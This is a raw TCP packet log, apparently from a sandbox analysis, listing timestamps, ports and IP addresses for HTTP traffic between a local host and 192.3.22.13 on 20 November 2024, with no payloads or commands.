Nov 20, 2024 07:50:01.253016949 CET	49164	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:01.253025055 CET	80	49164	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:01.253035069 CET	49164	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:01.253068924 CET	49164	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:01.253076077 CET	80	49164	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:01.253108025 CET	80	49164	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:01.253118992 CET	49164	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:01.253142118 CET	80	49164	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:01.253158092 CET	49164	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:01.253174067 CET	80	49164	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:01.253182888 CET	49164	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:01.253209114 CET	49164	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:01.253217936 CET	49164	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:01.334244013 CET	80	49164	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:01.334270954 CET	80	49164	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:01.334290981 CET	80	49164	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:01.334311008 CET	80	49164	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:01.334314108 CET	49164	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:01.334332943 CET	80	49164	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:01.334346056 CET	49164	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:01.334346056 CET	49164	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:01.334374905 CET	49164	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:01.334564924 CET	80	49164	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:01.334584951 CET	80	49164	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:01.334595919 CET	80	49164	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:01.334619045 CET	80	49164	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:01.334620953 CET	49164	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:01.334626913 CET	80	49164	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:01.334638119 CET	49164	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:01.334681034 CET	49164	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:01.334892035 CET	80	49164	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:01.334912062 CET	80	49164	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:01.334932089 CET	80	49164	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:01.334938049 CET	49164	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:01.334949970 CET	80	49164	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:01.334959030 CET	49164	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:01.334969997 CET	80	49164	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:01.334978104 CET	49164	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:01.334986925 CET	49164	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:01.334989071 CET	80	49164	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:01.335010052 CET	49164	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:01.335014105 CET	80	49164	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:01.335031033 CET	80	49164	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:01.335031033 CET	49164	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:01.335058928 CET	49164	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:01.335067987 CET	49164	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:01.335413933 CET	80	49164	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:01.335458040 CET	49164	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:01.335524082 CET	80	49164	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:01.335541964 CET	80	49164	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:01.335560083 CET	80	49164	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:01.335563898 CET	49164	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:01.335580111 CET	49164	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:01.335597992 CET	49164	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:01.335683107 CET	80	49164	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:01.335705042 CET	80	49164	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:01.335724115 CET	80	49164	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:01.335726023 CET	49164	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:01.335741997 CET	49164	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:01.335746050 CET	80	49164	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:01.335763931 CET	49164	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:01.335777044 CET	80	49164	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:01.335783005 CET	49164	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:01.335798025 CET	80	49164	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:01.335817099 CET	49164	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:01.335836887 CET	49164	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:01.336009979 CET	80	49164	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:01.336041927 CET	80	49164	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:01.336055994 CET	49164	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:01.336061954 CET	80	49164	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:01.336082935 CET	49164	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:01.336102009 CET	49164	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:01.336177111 CET	80	49164	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:01.336195946 CET	80	49164	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:01.336216927 CET	80	49164	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:01.336224079 CET	49164	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:01.336236954 CET	49164	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:01.336237907 CET	80	49164	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:01.336251020 CET	49164	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:01.336260080 CET	80	49164	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:01.336266041 CET	49164	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:01.336280107 CET	80	49164	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:01.336299896 CET	49164	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:01.336302042 CET	80	49164	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:01.336314917 CET	49164	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:01.336325884 CET	80	49164	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:01.336344957 CET	49164	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:01.336364985 CET	49164	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:01.337909937 CET	80	49164	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:01.337934971 CET	80	49164	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:01.337954998 CET	80	49164	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:01.337979078 CET	49164	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:01.337979078 CET	49164	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:01.337996960 CET	49164	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:01.338027000 CET	80	49164	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:01.338047028 CET	80	49164	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:01.338068008 CET	80	49164	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:01.338069916 CET	49164	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:01.338082075 CET	49164	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:01.338088989 CET	80	49164	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:01.338110924 CET	80	49164	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:01.338123083 CET	49164	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:01.338123083 CET	49164	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:01.338129044 CET	80	49164	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:01.338150978 CET	80	49164	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:01.338152885 CET	49164	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:01.338165998 CET	49164	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:01.338181019 CET	80	49164	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:01.338191032 CET	49164	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:01.338219881 CET	49164	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:01.338851929 CET	80	49164	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:01.338871956 CET	80	49164	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:01.338898897 CET	49164	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:01.338908911 CET	80	49164	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:01.338910103 CET	49164	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:01.338916063 CET	80	49164	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:01.338927984 CET	80	49164	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:01.338947058 CET	80	49164	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:01.338958025 CET	49164	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:01.338968992 CET	49164	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:01.338987112 CET	49164	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:01.339690924 CET	80	49164	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:01.339711905 CET	80	49164	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:01.339731932 CET	80	49164	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:01.339740038 CET	49164	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:01.339770079 CET	49164	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:01.339770079 CET	49164	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:01.339823008 CET	80	49164	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:01.339828968 CET	80	49164	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:01.339879036 CET	49164	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:01.345280886 CET	80	49164	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:01.345295906 CET	80	49164	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:01.345307112 CET	80	49164	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:01.345336914 CET	49164	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:01.345357895 CET	80	49164	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:01.345357895 CET	49164	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:01.345371008 CET	80	49164	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:01.345400095 CET	49164	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:01.345412970 CET	49164	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:01.347177982 CET	49164	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:01.352153063 CET	80	49164	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:01.352166891 CET	80	49164	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:01.352178097 CET	80	49164	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:01.352240086 CET	49164	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:01.352240086 CET	80	49164	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:01.352252960 CET	49164	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:01.352253914 CET	80	49164	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:01.352277994 CET	49164	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:01.352298975 CET	49164	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:01.352603912 CET	49164	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:03.491272926 CET	49164	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:08.941183090 CET	49165	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:08.946666002 CET	80	49165	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:08.947828054 CET	49165	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:08.947987080 CET	49165	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:08.953304052 CET	80	49165	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:09.525754929 CET	80	49165	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:09.525798082 CET	80	49165	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:09.525816917 CET	80	49165	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:09.525871038 CET	49165	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:09.525897026 CET	49165	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:09.525912046 CET	80	49165	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:09.525928974 CET	80	49165	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:09.525949001 CET	80	49165	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:09.525954962 CET	80	49165	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:09.525959015 CET	49165	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:09.525959969 CET	80	49165	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:09.525966883 CET	80	49165	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:09.525973082 CET	80	49165	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:09.525996923 CET	49165	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:09.526027918 CET	49165	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:09.531028986 CET	80	49165	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:09.531047106 CET	80	49165	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:09.531061888 CET	80	49165	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:09.531075954 CET	80	49165	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:09.531117916 CET	49165	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:09.531138897 CET	49165	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:09.531415939 CET	80	49165	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:09.531461954 CET	49165	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:09.568259001 CET	49165	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:09.613516092 CET	80	49165	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:09.613569975 CET	49165	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:09.613579988 CET	80	49165	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:09.613593102 CET	80	49165	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:09.613622904 CET	49165	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:09.613641024 CET	49165	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:09.613662004 CET	80	49165	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:09.613675117 CET	80	49165	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:09.613701105 CET	49165	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:09.613816023 CET	80	49165	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:09.613828897 CET	80	49165	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:09.613861084 CET	49165	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:09.613872051 CET	80	49165	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:09.613883018 CET	80	49165	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:09.613893986 CET	80	49165	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:09.613908052 CET	80	49165	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:09.613925934 CET	49165	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:09.613949060 CET	49165	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:09.614295006 CET	49165	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:09.614712954 CET	80	49165	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:09.614723921 CET	80	49165	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:09.614736080 CET	80	49165	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:09.614769936 CET	49165	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:09.614785910 CET	49165	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:09.614789963 CET	80	49165	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:09.614801884 CET	80	49165	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:09.614814043 CET	80	49165	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:09.614833117 CET	49165	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:09.614851952 CET	49165	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:09.615607977 CET	80	49165	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:09.615618944 CET	80	49165	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:09.615638018 CET	80	49165	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:09.615648985 CET	80	49165	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:09.615658045 CET	49165	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:09.615659952 CET	80	49165	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:09.615679979 CET	49165	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:09.615700960 CET	49165	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:09.654052973 CET	80	49165	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:09.654068947 CET	80	49165	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:09.654081106 CET	80	49165	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:09.654165983 CET	49165	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:09.700994968 CET	80	49165	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:09.701008081 CET	80	49165	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:09.701020002 CET	80	49165	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:09.701033115 CET	80	49165	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:09.701044083 CET	80	49165	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:09.701056004 CET	80	49165	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:09.701060057 CET	49165	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:09.701093912 CET	49165	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:09.701102018 CET	49165	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:09.701266050 CET	80	49165	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:09.701297998 CET	80	49165	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:09.701311111 CET	80	49165	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:09.701328993 CET	49165	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:09.701354027 CET	49165	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:09.701361895 CET	80	49165	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:09.701374054 CET	80	49165	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:09.701385975 CET	80	49165	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:09.701396942 CET	80	49165	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:09.701405048 CET	49165	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:09.701407909 CET	80	49165	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:09.701425076 CET	49165	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:09.701445103 CET	49165	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:09.702163935 CET	80	49165	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:09.702176094 CET	80	49165	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:09.702188015 CET	80	49165	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:09.702202082 CET	80	49165	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:09.702210903 CET	49165	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:09.702213049 CET	80	49165	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:09.702224016 CET	49165	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:09.702224970 CET	80	49165	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:09.702245951 CET	49165	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:09.702275991 CET	49165	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:09.702835083 CET	80	49165	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:09.702886105 CET	49165	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:09.702943087 CET	80	49165	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:09.702955008 CET	80	49165	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:09.702966928 CET	80	49165	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:09.702977896 CET	80	49165	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:09.702990055 CET	80	49165	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:09.702990055 CET	49165	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:09.703001976 CET	80	49165	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:09.703011990 CET	49165	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:09.703015089 CET	80	49165	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:09.703036070 CET	49165	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:09.703058004 CET	49165	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:09.703351021 CET	49165	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:09.703876019 CET	80	49165	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:09.703902960 CET	80	49165	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:09.703916073 CET	80	49165	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:09.703926086 CET	80	49165	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:09.703929901 CET	49165	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:09.703938007 CET	80	49165	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:09.703953028 CET	49165	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:09.703973055 CET	49165	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:09.703994036 CET	49165	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:09.717902899 CET	80	49165	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:09.717919111 CET	80	49165	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:09.717926025 CET	80	49165	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:09.717928886 CET	80	49165	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:09.717968941 CET	49165	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:09.717999935 CET	49165	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:09.718012094 CET	80	49165	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:09.718023062 CET	80	49165	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:09.718033075 CET	80	49165	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:09.718045950 CET	80	49165	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:09.718055964 CET	49165	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:09.718076944 CET	49165	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:09.718091965 CET	49165	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:09.741405010 CET	80	49165	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:09.741417885 CET	80	49165	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:09.741436005 CET	80	49165	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:09.741446972 CET	80	49165	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:09.741458893 CET	80	49165	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:09.741465092 CET	49165	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:09.741470098 CET	80	49165	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:09.741483927 CET	49165	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:09.741509914 CET	49165	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:09.741715908 CET	80	49165	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:09.741725922 CET	80	49165	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:09.741749048 CET	80	49165	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:09.741755009 CET	49165	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:09.741803885 CET	49165	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:09.741803885 CET	49165	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:09.788419962 CET	80	49165	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:09.788434982 CET	80	49165	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:09.788445950 CET	80	49165	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:09.788458109 CET	80	49165	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:09.788469076 CET	80	49165	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:09.788512945 CET	80	49165	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:09.788525105 CET	80	49165	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:09.788536072 CET	80	49165	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:09.788547993 CET	80	49165	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:09.788559914 CET	80	49165	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:09.788590908 CET	49165	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:09.788619041 CET	49165	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:09.788955927 CET	80	49165	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:09.788968086 CET	80	49165	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:09.788995981 CET	80	49165	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:09.789007902 CET	80	49165	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:09.789011002 CET	49165	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:09.789025068 CET	80	49165	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:09.789035082 CET	49165	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:09.789036036 CET	80	49165	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:09.789047956 CET	80	49165	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:09.789056063 CET	49165	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:09.789057970 CET	80	49165	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:09.789103985 CET	49165	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:09.789103985 CET	49165	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:09.789134026 CET	49165	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:09.789561033 CET	80	49165	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:09.789572954 CET	80	49165	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:09.789582968 CET	80	49165	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:09.789616108 CET	49165	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:09.789628029 CET	49165	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:09.789767981 CET	80	49165	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:09.789778948 CET	80	49165	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:09.789791107 CET	80	49165	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:09.789802074 CET	80	49165	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:09.789812088 CET	80	49165	192.3.22.13	192.168.2.22
